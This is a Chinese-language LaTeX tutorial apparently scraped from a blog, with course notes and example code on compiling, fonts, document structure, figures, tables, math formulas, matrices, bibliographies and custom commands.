    address = {Boston},
    edition = {Second}
    }

    需要多次编译:

    png

    \documentclass{ctexart}

    \bibliographystyle{plain} % 可选选项 plain unsrt alpha abbrv

    \begin{document}
    这是一个参考文献的引用:\cite{mittelbach2004}
    \bibliography{test}
    \end{document}
    • 使用\bibliography{test}以引用test.bib
    • 使用\cite{mittelbach2004}引用mittelbach2004

    使用google学术百度学术等获得bib格式文件:

    png

    • 使用\noctite{*}在参考文献中显示正文中未引用的文献。

    • 使用zotero从网站中批量获取文献的BibTeX

    • 使用JabRef管理参考文献中的.bib文件。

    png

    P14_latex14-LaTeX中的参考文献BibLaTeX

    • biblatex/biber新的 $\TeX$ 参考文献排版引擎。

    • 样式文件(参考文献样式文件–bbx文件,引用样式文件–cbx文件)使用 $\LaTeX$ 编写。

    • 支持根据本地化排版,如:

      • biber -l zh__pinyin texfile,用于指定按拼音排序
      • biber -l zh__stroke texfile,用于按笔画排序

    试不出来orz…可能是bib文件本身有问题?

    \documentclass{ctexart}

    \usepackage[style=caspervector,
    backend=biber,utf8,sorting=ecnty]{biblatex}

    \addbibresource{test.bib}

    \begin{document}
    % 一次管理,多次应用
    无格式化引用 \cite{2016An}

    带方括号的引用 \parencite{2016Analyzing}

    上标引用 \supercite{mittelbach2004}

    \printbibliography[title = {参考文献}] % 修改标题,默认为 References
    \end{document}

    P15_latex15-LaTeX中的自定义命令和环境

    • \newcommand定义命令
    • 命令只能由字母组成,不能以\end开头
    • \newcommand<命令>[<参数个数>][<首参数默认值>]{<具体定义>}

    ​ 定义命令和环境是进行$\LaTeX$格式定制、达成内容与格式分离目标的利器。使用自定义的命令和环境把字体、字号、缩进、对齐、间距等各种琐细的内容包装起来,赋以一个有意义的名字,可以使文挡结构清晰、代码整洁、易于维护。

    ​ 在使用宏定义的功能时,要综合利用各种已有的命令、环境、变量等功能,事实上,前面所介绍的长度变量与盒子、字体字号等内容,大多并不直接出现在文档正文中,而主要都是用在实现各种结构化的宏定义里。

    \documentclass{ctexart}

    % \newcommand 可以是简单的字符串替换,例如:
    % 使用 \PRC 相当于 People's Republic of \emph{China} 这一串内容
    \newcommand\PRC{People's Republic of \emph{China}}

    % \newcommand 也可以使用参数
    % 参数个数可以从 1 到 9,使用时用 #1, #2, ..., #9 表示
    \newcommand\loves[2]{#1 喜欢 #2}
    \newcommand\hatedby[2]{#2 不受 #1 喜欢}

    % \newcommand 的参数也可以有默认值
    % 指定参数个数的同时指定了首个参数的默认值,那么这个命令的
    % 第一个参数就成为可选的参数(要使用中括号指定)
    \newcommand\love[3][喜欢]{#2 #1 #3}

    % \renewcommand-重定义命令
    % 与 \newcommand 命令作用和用法相同,但只能用于已有命令
    % \renewcommand<命令>[<参数个数>][<首参数默认值>]{<具体定义>}
    \renewcommand\abstractname{内容简介}

    % 定义和重定义环境
    % \newenvironment<环境名称>}[<参数个数>][<首参数默认值>]
    % <环境前定义>
    % <环境后定义>
    % renewenvironment{<环境名称>}[<参数个数>][<首参数默认值>]
    % {<环境前定义>}
    % {<环境后定义>}

    % 为 book 类中定义摘要(abstract)环境
    \newenvironment{myabstract}[1][摘要]%
    {\small
    \begin{center}\bfseries #1\end{center}%
    \begin{quotation}}%
    {\end{quotation}}

    % 环境参数只有<环境前定义>中可以使用参数,
    % <环境后定义>中不能再使用环境参数。
    % 如果需要,可以先把前面得到的参数保存在一个命令中,在后面使用:
    \newenvironment{Quotation}[1]%
    {\newcommand\quotesource{#1}%
    \begin{quotation}}
    {\par\hfill---《\textit{\quotesource}》
    \end{quotation}}

    \begin{document}

    \PRC

    \loves{猫儿}{鱼}

    \hatedby{猫儿}{萝卜}

    \love{猫儿}{鱼}

    \love[最爱]{猫儿}{鱼}

    \begin{abstract}
    这是一段摘要...
    \end{abstract}

    \begin{myabstract}
    这是一段自定义摘要...
    \end{myabstract}

    \begin{Quotation}{易$\cdot$乾}
    初九,潜龙勿用。
    \end{Quotation}

    \end{document}
    ]]>
    + 资源

    课程

    P1_latex01-LaTeX 环境的安装与配置

    安装

    仅安装 $\TeX\ Live$ 即可,不要与$Mik\TeX$等混合安装!

    $C\TeX$本身封装了$Mik\TeX$。

    编译代码

    创建test.tex文件,并输入如下内容:

    1
    2
    3
    4
    5
    6
    7
    \documentclass{article}

    \begin{document}

    Hello \LaTeX

    \end{document}

    TERMINAL(终端)中输入latex test.tex以编译test.tex

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    PS D:\Study\0th-year-master\LateX\20230109> latex test.tex
    This is pdfTeX, Version 3.14159265-2.6-1.40.16 (MiKTeX 2.9)
    (test.tex
    LaTeX2e <2016/03/31>
    Babel <3.9q> and hyphenation patterns for 1 language(s) loaded.
    Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\size10.clo"))

    No file test.aux.
    [1] (test.aux) )
    Output written on test.dvi (1 page, 300 bytes).
    Transcript written on test.log.

    此时会生成test.dvi文件,继续输入dvipdfmx test.dvi继续编译生成test.pdf文件:

    1
    2
    3
    4
    PS D:\Study\0th-year-master\LateX\20230109> dvipdfmx test.dvi
    test.dvi -> test.pdf
    [1]
    2875 bytes written

    或者直接输入xlelatex test.tex直接将test.tex编译生成test.pdf文件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    PS D:\Study\0th-year-master\LateX\20230109> xelatex test.tex
    This is XeTeX, Version 3.14159265-2.6-0.99992 (MiKTeX 2.9)
    entering extended mode
    (test.tex
    LaTeX2e <2018-04-01> patch level 5
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\article.cls"
    Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\size10.clo"))
    (test.aux) [1] (test.aux) )
    Output written on test.pdf (1 page).
    Transcript written on test.log.

    也可直接写一个批处理文件bulid.bat完成操作:

    1
    2
    3
    latex test.tex
    dvipdfmx test.dvi
    del *.aux *.dvi *.log

    1
    2
    xelatex test.tex
    del *.aux *.dvi *.log

    随后直接在TERMINAL(终端)中输入build命令完成编译

    VS Code中可以直接使用Ctrl+Alt+B编译

    生成中文

    首先需要保证tex文件使用的是utf-8编码。

    使用\usepackage{ctex}引入宏包以支持中文。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    \documentclass{article}

    \usepackage{ctex}

    \begin{document}

    你好, \LaTeX

    \end{document}

    使用 TeXstudio

    P2_latex02-LaTeX 源文件的基本结构

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    % 导言区
    \documentclass{article} % book, report, letter
    \title{My First Document}
    \author{Nan Geng}
    \date{\today}
    % 正文区(文稿区)
    \begin{document}
    \maketitle
    Hello World!

    % here is my big formula.
    Let $f(x)$ be defined by the formula
    $$f(x)=3x^2+x-1$$ which is a polynomial of degree 2.
    \end{document}

    ​ 分为导言区正文区

    png

    P3_latex03-LaTeX 中的中文处理办法

    处理中文

    确定编译器是否为XeLaTeX且编码是否为UTF-8

    导言区使用

    1
    2
    3
    \documentclass{article}

    \usepackage{ctex}

    1
    \documentclass{ctexart}

    以支持中文。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    % 导言区
    \documentclass{ctexart}%book, report, letter

    % \usepackage{ctex}

    \newcommand\degree{^\circ}

    \title{\heiti 杂谈勾股定理}
    \author{张三}
    \date{\today}
    % 正文区(文稿区)
    \begin{document}
    \maketitle

    勾股定理可以用现代语言表述如下:

    直角三角形斜边的平方等于两腰的平方和。

    可以用符号语言表述为:设直角三角形 $ABC$,其中 $\angle
    C=90\degree$,则有:
    \begin{equation} % 用于产生带编号的行间公式
    AB^2 = BC^2 + AC^2.
    \end{equation}
    \end{document}
    • 在导言区使用\newcommand\degree{^\circ}定义\degree,否则会出现编译错误。
    • 使用\begin{equation}\end{equation}产生带编号的行间公式。

    查看帮助文档

    TERMINAL(终端)中输入texdoc ctex命令:

    png

    输入texdoc lshort-zh命令:

    png

    P4_latex04-LaTeX 的字体字号设置

    字体属性

    在 $\LaTeX$ 中,一个字体有 5 种属性:

    • 字体编码

      • 正文字体编码:OT1、T1、EU1 等
      • 数学字体编码:OML、OMS、OMX 等
    • 字体族

      • 罗马字体 Roman Family \textrm:笔画起始处有装饰
      • 无衬线字体 Sans Serif Family \textsf:笔画起始处无装饰
      • 打字机字体 Typewriter Family \texttt:每个字符宽度相同,又称等宽字体
    • 字体系列

      • 粗细
      • 宽度
    • 字体形状

      • 直立 Upright Shape
      • 斜体 Italic Shape
      • 伪斜体 Slanted Shape
      • 小型大写 Small Caps Shape
    • 字体大小

    字体族设置

    注意修饰符及其作用域范围:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    % 字体族设置(罗马字体 Roman Family、无衬线字体 Sans Serif Family、打字机字体 Typewriter Family)
    \textrm{Roman Family}
    \textsf{Sans Serif Family}
    \texttt{Typewriter Family}

    \rmfamily Roman Family
    {\sffamily Sans Serif Family}
    {\ttfamily Typewriter Family}

    {\sffamily who you are? you find self on everyone around.
    take you as the same as others!}

    {\ttfamily Are you wiser than others?
    definitely no. insome ways, may it is true.
    what can you achieve? aluxurious house?
    a brillilant car? an admirable career?who knows? }

    字体系列设置(粗细、宽度)

    1
    2
    3
    4
    % 字体系列设置(粗细、宽度)
    \textmd{Medium Series} \textbf{Boldface Series}

    {\mdseries Medium Series} {\bfseries Boldface Series}

    字体形状(直立、斜体、伪斜体、小型大写)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    \textup{Upright Shape}
    \textit{Italic Shape}
    \textsl{Slanted Shape}
    \textsc{Small Caps Shape}

    {\textup Upright Shape}
    {\textit Italic Shape}
    {\textsl Slanted Shape}
    {\textsc Small Caps Shape}

    中文字体

    1
    2
    3
    4
    5
    6
    7
    % 中文字体
    {\songti 宋体}
    {\heiti 黑体}
    {\fangsong 仿宋}
    {\kaishu 楷书}

    中文字体的\textbf{粗体}是{\heiti 黑体},\textit{斜体}是{\kaishu 楷体}。

    字体大小

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    % 字体大小
    {\tiny Hello}\\
    {\scriptsize Hello}\\
    {\footnotesize Hello}\\
    {\small Hello}\\
    {\normalsize Hello}\\
    {\large Hello}\\
    {\Large Hello}\\
    {\LARGE Hello}\\
    {\huge Hello}\\
    {\Huge Hello}\\

    中文字号设置命令

    1
    2
    % 中文字号设置命令
    \zihao{-0} 你好!

    自定义字体

    过多的修饰符不符合$\LaTeX$的思想,使用\newcommand自定义字体。

    导言区中:

    1
    \newcommand{\myfont}{\textbf{\textsf{Fancy Text}}}

    会将正文区所有\myfont替换为\textbf{\textsf{Fancy Text}}

    1
    2
    % 使用自定义字体
    \myfont

    P5_latex05-LaTeX 文档的基本结构

    分节

    正文区中,使用\section{}列提纲,分节,可以使用\subsection{}\subsubsection{}继续分节。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    \documentclass{article}

    \usepackage{ctex}

    \begin{document}

    \section{引言}
    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \subsubsection{实验条件}
    \subsubsection{实验过程}
    \section{结论}
    \section{致谢}

    \end{document}

    设置格式

    使用\documentclass{ctexart}会更改格式,但是这个格式可以自行设置。

    导言区设置格式。将内容与格式分离,是$\LaTeX$的基本思想。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    \documentclass{ctexart}
    % =======设置标题的格式========
    \ctexset{
    % 修改 section。
    section={
    name={,、},
    number={\chinese{section}},
    format=\heiti\raggedright\zihao{-4}, % 设置 section 标题为黑体、右对齐、小 4 号字
    aftername=\hspace{0pt},
    beforeskip=1ex,
    afterskip=1ex
    },
    % 修改 subsection。
    subsection={
    name={,、},
    number={\arabic{subsection}},
    format=\heiti\zihao{5}, % 设置 subsection 标题为黑体、5 号字
    aftername=\hspace{0pt},
    beforeskip=1ex,
    afterskip=1ex
    }
    }

    \begin{document}

    \section{引言}
    近年来,随着逆向工程和三维重建技术的发展和应用,
    获取现实世界中物体的三维数据的方法越来越多的关注和研究,
    很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    近年来,随着逆向工程和三维重建技术的发展和应用,\\
    获取现实世界中物体的三维数据的方法越来越多的关注和研究。
    \par 很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \subsubsection{实验条件}
    \subsubsection{实验过程}
    \section{结论}
    \section{致谢}

    \end{document}
    • 使用空行或\par可以另起一段
    • 使用\\会换行,但是不会另起一段

    设置目录

    使用\documentclass{ctexbook}\tableofcontents生成目录。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    \documentclass[UTF8,a4paper,15pt,titlepage,oneside]{ctexbook}

    \begin{document}
    \tableofcontents
    \chapter{绪论}
    \section{引言}
    近年来,随着逆向工程和三维重建技术的发展和应用,
    获取现实世界中物体的三维数据的方法越来越多的关注和研究,
    很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    近年来,随着逆向工程和三维重建技术的发展和应用,\\
    获取现实世界中物体的三维数据的方法越来越多的关注和研究。
    \par 很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \section{结论}
    \section{致谢}

    \end{document}

    P6_latex06-LaTeX 中的特殊字符

    • 特殊字符
      • 空白符号
        • 空行分段,多个空行等同 1 个
        • 自动缩进,绝对不能使用空格代替
        • 英文中多个空格处理为 1 个空格,中文中空格将被忽略
        • 汉字与其它字符的间距会自动由 XeLaTex 处理
        • 禁止使用中文全角空格
      • $\LaTeX$控制符
      • 排版符号
      • $\TeX$标志符号
      • 引号
      • 连字符
      • 非英文字符
      • 重音符号(以 o 为例)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    \documentclass{article}

    \usepackage{ctex}
    \usepackage{xltxtra}
    \usepackage{texnames}
    \usepackage{mflogo}

    \begin{document}

    \section{空白符号}
    % 1em(当前字体中 M 的宽度)
    a\quad b

    % 2em
    a\qquad b

    % 约为 1/6 个 em
    a\,b a\thinspace b

    % 0.5 个 em
    a\enspace b

    % 空格
    a\ b

    % 硬空格
    a~b

    % 1pc=12pt=4.2188mm
    a\kern 1pc b

    a\kern -1em b % 可以为负数

    a\hskip 1em b

    a\hspace{35pt}b

    % 占位宽度
    a\hphantom{xyz}b

    % 弹性长度
    a\hfill b

    \section{\LaTeX 控制符}
    \# \$ \% \{ \} \~{} \_{} \^{} \textbackslash \&

    \section{排版符号}
    \S \P \dag \ddag \copyright \pounds

    \section{\TeX 标志符号}
    % 基本符号
    \TeX{} \LaTeX{} \LaTeXe{}

    % xltxtra 宏包提供
    \XeLaTeX

    % texnames 宏包提供
    \AmSTeX{} \AmS-\LaTeX{}
    \BibTeX{} \LuaTeX{}

    % mflogo 宏包提供
    \METAFONT{} \MF{} \MP{}

    \section{引号}
    `'``''``你好''

    \section{连字符}
    - -- ---

    \section{非英文字符}
    \oe \OE \ae \AE \aa \AA \o \O \l \L \ss \SS !`?`

    \section{重音符号(以 o 为例)}
    \`o \'o \^o \''o \~o \=o \.o \u{o} \v{o} \H{o} \r{o} \t{o} \b{o} \c{o} \d{o}

    \end{document}

    P7_latex07-LaTeX 中的插图

    • 使用\usepackage{graphicx}实现插图

    • 语法:\includegraphics[< 选项 >][< 文件名 >]

      • 选项可以有:

        • scale=0.3 缩放 0.3 倍
        • height=2cm 高 2cm
        • width=2cm 宽 2cm
        • height=0.1\textheight 0.1 倍行高
        • width=0.2\textwidth 0.2 倍行宽
        • angle=-45, width0.2\textwidth 顺时针旋转 45°,并且 0.2 倍行宽

        使用终端命令texdoc graphicx查看帮助文档。

      • 文件名可加后缀可不加

    • 格式:EPS、PDF、PNG、JPEG、BMP

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    \documentclass{ctexart}
    \usepackage{graphicx}
    \graphicspath{{figures/}, {pics/}} % 图片在当前目录下的 figures 或 pics 目录

    \begin{document}
    \LaTeX{}中的插图:

    \includegraphics[scale=0.3]{lion}
    \end{document}

    png

    P8_latex08-LaTeX 中的表格

    1
    2
    3
    \begin{tabular}[<垂直对齐方式>]{<列格式说明>}
    <表项> & <表项> & ... & <表项> \\
    \end{tabular}

    • \\表示换行
    • &表示不同的列
    • 列格式说明:
      • l 本列左对齐
      • c本列居中对齐
      • r本列右对齐
      • p{<宽>}本列宽度固定,能够自动换行
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    \documentclass{ctexart}

    \begin{document}
    \begin{tabular}{|l|c|c|c|p{1.5cm}|}
    \hline \hline
    姓名 & 语文 & 数学 & 外语 & 备注 \\
    \hline
    张三 & 87 & 100 & 93 & 优秀 \\
    \hline
    李四 & 75 & 64 & 52 & 补考另行通知 \\
    \hline
    王二 & 80 & 82 & 78 & \\
    \hline
    \end{tabular}
    \end{document}

    P9_latex09-LaTeX中的浮动体

    要灵活地使用图像和表格的管理,还需要使用浮动体环境。包含figure浮动体环境和table浮动体环境。


    浮动体:

    • 实现灵活分页(避免无法分割的内容产生的页面留白)
    • 给图表添加标题
    • 交叉引用

    figure环境(table环境与之类似)

    1
    2
    3
    \begin{figure}[<允许位置>]
    <任意内容>
    \end{figure}

    <允许位置>参数(默认tbp

    • h,此处(here)-代码所在的上下文位置
    • t,页顶(top)-代码所在页面或之后页面的顶部
    • b,页底(bottom)-代码所在页面或之后页面的底部
    • p,独立一页(page)-浮动页面

    标题控制(caption、bicaption等宏包)

    并排与子图表(subcaption、subfig、floatrow等宏包

    绕排(picinpar、wrapfig等宏包)


    使用\ref{}\label{}进行交叉引用,通常要编译两次才生效。


    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    \documentclass{ctexart}
    \usepackage{graphicx}
    \graphicspath{{figures/}}

    \begin{document}

    \LaTeX{}中\TeX 系统的吉祥物---小狮子见图\ref{fig-lion}。

    \begin{figure}[htbp]
    \centering
    \includegraphics[scale=0.3]{lion}
    \caption{\TeX 系统的吉祥物---小狮子}\label{fig-lion}
    \end{figure}

    遥看太白,看积雪皑皑,别有一番风景(图\ref{fig-mountain})

    \begin{figure}[htbp]
    \centering
    \includegraphics[scale=0.3]{mountain}
    \caption{太白山}\label{fig-mountain}
    \end{figure}

    当然,在\LaTeX{}中也可以使用表\ref{tab-score}所示的表格。

    \begin{table}[h]
    \centering
    \caption{考试成绩单}\label{tab-score}
    \begin{tabular}{|l|c|c|c|p{1.5cm}|}
    \hline \hline
    姓名 & 语文 & 数学 & 外语 & 备注 \\
    \hline
    张三 & 87 & 100 & 93 & 优秀 \\
    \hline
    李四 & 75 & 64 & 52 & 补考另行通知 \\
    \hline
    王二 & 80 & 82 & 78 & \\
    \hline
    \end{tabular}
    \end{table}

    \end{document}

    P10_latex10-LaTeX数学公式初步

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    \documentclass{article}

    \usepackage{ctex}
    \usepackage{amsmath}

    \begin{document}
    \section{简介}
    \LaTeX{}将排版内容分为文本模式和数学模式。
    文本模式用于普通文本排版,数学模式用于数学公式排版。
    \section{行内公式}
    \subsection{美元符号}
    交换律是 $a+b=b+a$,如 $1+2=2+1=3$
    \subsection{小括号}
    交换律是 \(a+b=b+a\),如\(1+2=2+1=3\)
    \subsection{math环境}
    交换律是 \begin{math}a+b=b+a\end{math},如
    \begin{math}1+2=2+1=3\end{math}。
    \section{上下标}
    \subsection{上标}
    $3x^{20} - x + 2 = 0$

    $3x^{3x^{20} - x + 2} - x + 2 = 0$
    \subsection{下标}
    $a_0, a_1, a_2$

    $a_0, a_1, a_2, ..., a_{3x^{20} - x + 2}$
    \section{希腊字母}
    $\alpha$
    $\beta$
    $\gamma$
    $\epsilon$
    $\pi$
    $\omega$

    $\Gamma$
    $\Delta$
    $\Theta$
    $\Pi$
    $\Omega$

    $\alpha^3 + \beta^2 + \gamma = 0$

    \section{数学函数}
    $\log$
    $\sin$
    $\cos$
    $\arcsin$
    $\arccos$
    $\arctan$
    $\ln$

    $\sin^2x+\cos^2x=1$
    $y=\arcsin x$

    $y=\sin^{-1}x$

    $y=\log_2x$

    $y=\ln x$

    $\sqrt{2}$ $\sqrt{x^2+y^2}$ $\sqrt{2+\sqrt{2}}$ $\sqrt[4]{x}$
    \section{分式}
    大约是原体积的$3/4$
    大约是原体积的$\frac{3}{4}$

    $\frac{x}{x^2 + x + 1}$

    $\frac{\sqrt{x-1}}{\sqrt{x+1}}$

    $\frac{1}{1 + \frac{1}{x}}$

    $\sqrt{\frac{x}{x^2 + x + 1}}$
    \section{行间公式}
    \subsection{美元符号}
    交换律是
    $$a+b=b+a$$

    $$1+2=2+1=3$$
    \subsection{中括号}
    交换律是
    \[a+b=b+a\]

    \[1+2=2+1=3\]
    \subsection{displaymath环境}
    交换律是
    \begin{displaymath}
    a+b=b+a,
    \end{displaymath}

    \begin{displaymath}
    1+2=2+1=3.
    \end{displaymath}
    \subsection{自动编号公式equation环境}
    交换律见式\ref{eq:commutative}
    \begin{equation}
    a+b=b+a \label{eq:commutative}
    \end{equation}
    \subsection{不编号公式equation*环境} % 需要使用amsmath宏包
    交换律见式\ref{eq:commutative2}
    \begin{equation*}
    a+b=b+a \label{eq:commutative2}
    \end{equation*}

    公式的编号与交叉引用也是自动实现的,
    大家在排版中,要习惯与采用自动化的方式处理图、表、公式的编号与交叉引用。
    \end{document}

    latex11-LaTeX数学公式的矩阵

    矩阵环境:

    • &分割列
    • \\分割行
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    \documentclass{ctexart}

    \usepackage{amsmath}

    \newcommand{\adots}{\mathinner{\mkern2mu
    \raisebox{0.1em}{.}
    \mkern2mu\raisebox{0.4em}{.}
    \mkern2mu\raisebox{0.7em}{.}\mkern1mu}}

    \begin{document}
    \section{matrix环境}
    \[
    \begin{matrix}
    0 & 1 \\
    1 & 0
    \end{matrix}
    \]

    \section{pmatrix环境}
    \[
    \begin{pmatrix}
    0 & -1 \\
    1 & 0
    \end{pmatrix}
    \]

    \section{bmatrix环境}
    \[
    \begin{bmatrix}
    0 & -1 \\
    1 & 0
    \end{bmatrix}
    \]

    \section{Bmatrix环境}
    \[
    \begin{Bmatrix}
    0 & -1 \\
    1 & 0
    \end{Bmatrix}
    \]

    \section{vmatrix环境}
    \[
    \begin{vmatrix}
    0 & -1 \\
    1 & 0
    \end{vmatrix}
    \]

    \section{Vmatrix环境}
    \[
    \begin{Vmatrix}
    0 & -1 \\
    1 & 0
    \end{Vmatrix}
    \]

    \section{可以使用上下标}
    \[
    A = \begin{pmatrix}
    a_{11}^2 & a_{12}^2 & a_{13}^2 \\
    0 & a_{22} & a_{23} \\
    0 & 0 & a_{33}
    \end{pmatrix}
    \]

    \section{常用省略号:$\backslash$dots,$\backslash$vdots,$\backslash$ddots}
    没有$\backslash$adots,需要手动定义。
    \[
    A = \begin{bmatrix}
    a_{11} & \dots & a_{1n} \\
    \adots & \ddots & \vdots \\
    0 & & a_{nn}
    \end{bmatrix}_{n \times n}
    \]

    \section{分块矩阵(矩阵嵌套)}
    \[
    \begin{pmatrix}
    \begin{matrix}1&0\\0&1\end{matrix} & \text{\Large 0} \\
    \text{\Large 0} & \begin{matrix} 1&0\\0&-1\end{matrix}
    \end{pmatrix}
    \]

    \section{三角矩阵}
    \[
    \begin{pmatrix}
    a_{11} & a_{12} & \cdots & a_{1n} \\
    & a_{22} & \cdots & a_{2n} \\
    & & \ddots & \vdots \\
    \multicolumn{2}{c}{\raisebox{1.3ex}[0pt]{\Huge 0}} & & a_{nn}
    \end{pmatrix}
    \]

    \section{跨列的省略号} % \hdotsfor{columns}
    \[
    \begin{pmatrix}
    1 & \frac 12 & \dots & \frac 1n \\
    \hdotsfor{4} \\
    m & frac m2 & \dots & \frac mn
    \end{pmatrix}
    \]

    \section{行内小矩阵(smallmatrix)环境}
    复数 $z = (x, y)$ 可也用矩阵
    \begin{math}
    \left(
    \begin{smallmatrix}
    x & -y \\
    y & -x
    \end{smallmatrix}
    \right)
    \end{math}
    来表示。

    \section{array环境(类似于表格环境tabular)}
    \[
    \begin{array}{r|r}
    \frac{1}{2} & 0 \\
    \hline
    0 & -\frac a{bc} \\
    \end{array}
    \]

    \section{用array环境构造复杂矩阵}
    \[
    % @{<内容>}-添加任意内容,不占表项计数
    % 此处添加一个负值空白,表示向左移-5pt的距离
    \begin{array}{c@{\hspace{-5pt}}l}
    % 第1行,第1列
    \left(
    \begin{array}{ccc|ccc}
    a & \cdots & a & b & \cdots & b \\
    & \ddots & \vdots & \vdots & \adots \\
    & a & b \\ \hline
    & & & c & \cdots & c \\
    & & & \vdots & & \vdots \\
    \multicolumn{3}{c|}{\raisebox{2ex}[0pt]{\Huge 0}} & c & \cdots & c
    \end{array}
    \right)
    % 第1行,第2列
    \begin{array}{l}
    % \left. 仅表示与 \right\} 配对,什么都不输出
    \left. \rule{0mm}{7mm}\right\}p \\
    \\
    \left.\rule{0mm}{7mm}\right\}q
    \end{array}
    \\[-5pt]
    % 第2行第1列
    \begin{array}{cc}
    \underbrace{\rule{17mm}{0mm}}_m &
    \underbrace{\rule{17mm}{0mm}}_m
    \end{array}
    & % 第2行第2列
    \end{array}
    \]

    \end{document}

    latex12-LaTeX数学公式的多行公式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    \documentclass{ctexart}

    \usepackage{amsmath}
    \usepackage{amssymb}

    \begin{document}
    \section{gather 标准多行公式}
    \subsection{gather 带编号}
    \begin{gather}
    a + b = b + a \\
    ab ba
    \end{gather}

    \subsection{gather* 不带编号}
    \begin{gather*}
    3+5=5+3=8 \\
    3 \times 5 = 5 \times 3
    \end{gather*}

    \subsection{在换行符前使用 notag 阻止编号}
    \begin{gather}
    3^2 + 4^2 = 5^2 \notag \\
    5^2 + 12^2 = 13^2 \notag \\
    a^2 + b^2 = c^2
    \end{gather}

    \section{align 对齐多行公式}
    \subsection{align 带编号}
    \begin{align}
    x & = t + \cos t + 1 \\
    y & = 2\sin t
    \end{align}

    \subsection{align* 不带编号}
    \begin{align*}
    x & = t & x & = \cos t & x & =t \\
    y & = 2t & y & = \sin(t+1) & y & = \sin t
    \end{align*}

    \section{split 环境(对齐采用 align 环境的方式,编号在中间)}
    \begin{equation}
    \begin{split}
    \cos 2x &= \cos^2x - \sin^2x \\
    &= 2\cos^2x - 1
    \end{split}
    \end{equation}

    \section{cases 环境}
    分段函数,每行公式中使用 \& 分割为两部分,通常表示值和后面的条件。
    \begin{equation}
    D(x) = \begin{cases}
    1, & \text{如果 } x \in \mathbb{Q}; \\
    0, & \text{如果 } x \in \mathbb{R}\setminus\mathbb{Q}.
    \end{cases}
    \end{equation}
    \end{document}

    P13_latex13-LaTeX中的参考文献BibTex

    直接在tex文件中管理

    1
    2
    3
    4
    5
